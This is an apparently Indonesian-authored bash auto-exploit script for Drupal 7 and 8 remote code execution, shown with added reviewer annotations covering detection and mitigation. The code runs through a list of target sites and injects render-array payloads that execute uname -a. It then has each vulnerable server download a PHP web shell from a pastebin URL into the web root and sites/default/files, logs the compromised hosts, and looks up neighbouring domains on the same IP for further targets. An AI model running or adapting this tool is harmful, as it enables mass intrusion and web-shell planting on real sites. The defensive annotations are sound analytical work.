
Exploiter CMS Drupal RCE

zerobyte-id May 3rd, 2018 (edited) 409 Never
  1. #!/bin/bash
  2. # AutoExploit [BOT]
  3. # Remote Code Execute CMS Drupal 7.x - 8 + Reverse IP
  4. # Date : 22 - Apr - 2018
  5. # Usage : ./rce.sh list.txt
  6. # Coded by ZeroByte.ID
  7. useragent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0";
     # Reviewer annotation: browser-like User-Agent string, referenced only in
     # drupal7() and always as an unquoted `-A ${useragent}`. The drupal8()
     # requests pass no -A option at all. Because the expansion is unquoted the
     # shell splits it on spaces, so the value on the wire is presumably just
     # the first word; log searches should not depend on the full string.
  8. reverse() {
       # Reviewer annotation (code lines unchanged).
       # Purpose:   resolve $1 with `dig +short`, submit the result to the
       #            hackertarget.com reverse-IP lookup API and append the
       #            returned hostnames to domains.tmp. In this file it is only
       #            called after an upload check has matched, so it lists other
       #            names served from an address already found affected.
       # Arguments: $1 - value handed to dig (callers pass $target unchanged).
       # Globals:   target, getip, check, list are assigned without `local`.
       # Returns:   1 when the API answer contains 'No records found' or
       #            'error check'; the rate-limit branch ends the whole script.
       # Files:     domain.tmp / domains2.tmp (scratch, removed at the end) and
       #            domains.tmp (appended, kept) in the working directory.
  9.   target=$1
  10.   getip=$(dig +short $1);
  11.   check=$(curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip});
        # The quoted right-hand sides below are matched as literal substrings.
  12.    if [[ $check =~ 'No records found' ]]; then
  13.       echo "[BAD] $getip";
  14.       return 1
  15.    elif [[ $check =~ 'error check' ]]; then
  16.       echo "[BAD] $getip";
  17.       return 1
  18.    elif [[ $check =~ 'API count exceeded' ]]; then
  19.       echo "[WAITING]"
            # Indonesian operator messages, roughly: "the robot needs a short
            # break", "do not stop it", "coffee break for about 10 minutes".
  20.       echo "ROBOT BUTUH ISTIRAHAT BENTARAN!";
  21.       echo "[JANGAN DI STOP!]";
  22.       echo "GUA LAGI NGOPI KURANG LEBIH 10 Menit";
  23.       sleep 10m;
            # `exit`, not `return`: the script terminates after the sleep.
  24.       exit
  25.    else
            # Same API query issued a second time; this response is what gets
            # written to disk.
  26.       curl -s https://api.hackertarget.com/reverseiplookup/?q=${getip} >> domain.tmp
  27.       sleep 0.5s
            # Line count is taken before the prefix stripping and de-duplication.
  28.       list=$(cat domain.tmp | wc -l);
            # The dots are unescaped and the substitutions are global, so any
            # "www"/"mail" followed by one character is removed wherever it occurs.
  29.       cat domain.tmp | sed 's|www.||g' | sed 's|mail.||g' >> domains2.tmp
            # Appended, so domains.tmp accumulates across calls.
  30.       sort domains2.tmp | uniq >> domains.tmp
  31.       echo "[OK] $getip and $list site";
  32.       sleep 0.6s
  33.       rm domain.tmp
  34.       rm domains2.tmp
  35.     fi
  36. }
  37. drupal7() {
        # Reviewer annotation (code lines unchanged).
        # Purpose:   probe $1 for the Drupal 7 Form API render-array injection
        #            this script targets. It POSTs to the password-reset form
        #            (?q=user/password) with name[...] query parameters holding
        #            render-array keys (#post_render, #type, #markup; '#' sent
        #            as %23), then replays the returned form_build_id against
        #            ?q=file/ajax/name/%23value/<id>. A reply containing 'Linux'
        #            is treated as confirmation; two further rounds then ask the
        #            host to fetch a remote PHP file as zb.php.
        # Arguments: $1 - target base URL, used as the prefix of every request.
        # Files:     cookie.tmp (cookie jar), result.txt and gagal-upload.txt
        #            ("gagal" = failed) in the working directory.
        # Detection: in web logs, a POST to /?q=user/password whose query string
        #            contains post_render, followed by a POST to
        #            ?q=file/ajax/name/%23value/form-..., then GET /zb.php and
        #            GET /sites/default/files/zb.php; on the host, an outbound
        #            request from the web server account to pastebin.com.
        # Mitigation: install the Drupal core security release for this issue,
        #            reject request parameter names beginning with '#', deny PHP
        #            execution under sites/default/files, and restrict outbound
        #            traffic from web servers.
  38.     target=$1
  39.     echo -ne "---";
          # First request also creates cookie.tmp; only response lines that
          # contain form_build_id are kept. ${useragent} is unquoted, so the
          # shell splits it on spaces before curl sees it.
  40.     cek7=$(curl -s -m 10 -X POST -A ${useragent} --cookie-jar cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id);
  41.     echo -ne "-------";
  42.     sleep 2s
          # A form_build_id value starting with "form-" is taken to mean the
          # password form was rendered.
  43.     if [[ $cek7 =~ 'value="form-' ]]; then
  44.         echo -ne "--------------------------";
              # Same request again with the saved cookies; the first
              # form_build_id value is extracted into $token.
  45.         token=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=uname+-a" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  46.         echo -ne "----------------------------------";
  47.         echo
  48.         sleep 2s
              # Second stage: replay the id on the file/ajax path and keep the
              # first line of the response.
  49.         result=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${token}" --data "form_build_id=${token}" | head -1)
              # 'Linux' in that line is read as output of the `uname -a` markup.
  50.         if [[ $result =~ 'Linux' ]]; then
  51.           echo "[O] VULN RCE $target : uname -a"
  52.           echo "$result";
                # Indonesian, roughly: "shell upload in progress".
  53.           echo "Proses Upload Shell ....."
  54.           sleep 2s
                # Same two-step sequence, with markup that has the host run wget
                # against a pastebin.com raw URL. Forensics: this request uses
                # wget's lowercase -o (log file) option, so an affected host may
                # show zb.php holding wget log text while the fetched content is
                # saved under the URL's last path segment; hunt for both names.
  55.           uploadhome=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  56.           curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploadhome}" --data "form_build_id=${uploadhome}" | head -1 > /dev/null
  57.           sleep 5s
                # Verification is a plain GET of /zb.php, looking for the marker
                # string 'ZeroByte.ID' in the body.
  58.           cekshellhome=$(curl -s -m 10 "${target}/zb.php");
  59.           if [[ $cekshellhome =~ 'ZeroByte.ID' ]]; then
  60.             echo "[HOME] Upload Done"
  61.             echo "$result" >> result.txt
  62.             echo "$target/zb.php" | tee -a result.txt
  63.           else
  64.             echo "[HOME] Can't Upload"
  65.           fi
  66.           sleep 2s
                # Second attempt, this time naming sites/default/files/zb.php.
  67.           uploaddir=$(curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=user/password&name\[%23post_render\]\[\]=passthru&name\[%23type\]=markup&name\[%23markup\]=wget+-o+sites/default/files/zb.php+"https://pastebin.com/raw/S1c9b4ne"" --data "form_id=user_pass&_triggering_element_name=name" | grep form_build_id | grep -Po '(?<=value=")[^" \>]*' | head -1);
  68.           curl -s -m 10 -X POST -A ${useragent} -b cookie.tmp "${target}/?q=file/ajax/name/%23value/${uploaddir}" --data "form_build_id=${uploaddir}" | head -1 > /dev/null
  69.           sleep 5s
  70.           cekshell=$(curl -s -m 10 "${target}/sites/default/files/zb.php");
  71.           if [[ $cekshell =~ 'ZeroByte.ID' ]]; then
  72.             echo "[DIR WRITABLE] Upload Done"
  73.             echo "$result" >> result.txt
  74.             echo "$target/sites/default/files/zb.php" | tee -a result.txt
  75.             echo "=====================================" >> result.txt
                  # Only this branch goes on to the reverse-IP lookup.
  76.             reverse $target
  77.           else
  78.             echo "[DIR WRITABLE] Can't Upload"
  79.             echo "$target" >> gagal-upload.txt
  80.           fi
  81.           echo "--------------------------------------------------------------------------"
  82.         else
                # No 'Linux' in the reply: fall through to the Drupal 8 path.
  83.             echo "[X] NOT VULN $target"
  84.             drupal8 $target
  85.         fi
  86.     else
            # No usable form_build_id: fall through to the Drupal 8 path.
  87.         echo
  88.         echo "[X] NOT VULN $target";
  89.         drupal8 $target
  90.        
  91.     fi
  92. }
  93. drupal8() {
        # Reviewer annotation (code lines unchanged).
        # Purpose:   Drupal 8 path, reached only from drupal7()'s two
        #            "NOT VULN" branches. It sends two POSTs to
        #            /user/register?element_parents=account/mail/%23value
        #            &ajax_form=1&_wrapper_format=drupal_ajax whose body sets
        #            mail[a][#post_render][]=exec and a #markup that runs wget
        #            against a pastebin.com raw URL, naming zb.php and
        #            sites/default/files/zb.php as output files. There is no
        #            separate probe step before these requests.
        # Arguments: $1 - target base URL.
        # Files:     result.txt and not-vuln.txt in the working directory.
        # Detection: POST to /user/register with element_parents=account/mail/
        #            %23value and _wrapper_format=drupal_ajax, body containing
        #            #post_render; no -A is passed, so curl's default
        #            User-Agent applies; -k means TLS certificate errors do not
        #            stop the request. On the host, look for zb.php in the web
        #            root and under sites/default/files, and for outbound
        #            requests from the web server account to pastebin.com.
        # Mitigation: install the Drupal core security release for this issue,
        #            reject request parameter names beginning with '#', deny
        #            PHP execution under sites/default/files, restrict egress.
  94.   target=$1
  95.   echo "[O] CHECKING DRUPAL 8";
  96.   echo -ne "---";
  97.   cek8=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O zb.php")
  98.   cek8_=$(curl -s -m 10 -k "${target}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" --data "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=exec&mail[a][#type]=markup&mail[a][#markup]=wget 'https://pastebin.com/raw/S1c9b4ne' -O sites/default/files/zb.php")
  99.   echo -ne "-------------------";
         # Both checks inspect the body of the POST response itself for the
         # marker string; the written file is not requested here.
  100.   if [[ $cek8 =~ 'ZeroByte.ID' ]]; then
  101.     echo -ne "-------------------------------------------";
  102.     echo "[O] Upload Done"
  103.     echo "$target/zb.php" | tee -a result.txt
  104.     reverse $target
  105.   else
  106.     if [[ $cek8_ =~ 'ZeroByte.ID' ]]; then
  107.       echo -ne "-------------------------------------------";
  108.       echo "[O] Upload Done"
  109.       echo "$target/sites/default/files/zb.php" | tee -a result.txt
  110.     fi
           # These lines run for every target that reaches the outer else,
           # whether or not the inner check matched.
  111.     echo
  112.     echo "[X] NOT VULN $target !"
  113.     echo -ne "-------------------------------------------------";
  114.     echo "$target" >> not-vuln.txt
  115.     echo
  116.   fi
  117. }
  118.  
  119. cat << "banner"
  120. --------------------------------------------------
  121.                    _           _         _     _
  122.  _______ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  123. |_  / _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
  124.  / /  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
  125. /___\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
  126.                          |___/                  
  127.                                             kUr4x        
  128. ----------------[ RCE Drupal ]--------------------
  129.  
  130. banner
       # Reviewer annotation (code lines unchanged): the lines above are a
       # quoted here-document, so the banner is printed verbatim.
  131.  
       # Main loop: $1 is the target list file named in the Usage header line.
       # `$(cat $1)` is unquoted, so entries are split on any whitespace. Each
       # entry goes to drupal7(), which itself falls through to drupal8();
       # the run is therefore sequential, one target at a time, with the
       # fixed sleeps inside those functions pacing the requests.
  132. for s in $(cat $1); do
  133.     echo "CHECKING DRUPAL 7 $s"
  134.     echo -ne "----";
  135.     drupal7 $s
  136. done
       # Only the cookie jar is cleaned up; result.txt, gagal-upload.txt,
       # not-vuln.txt and domains.tmp are left in the working directory.
  137. rm cookie.tmp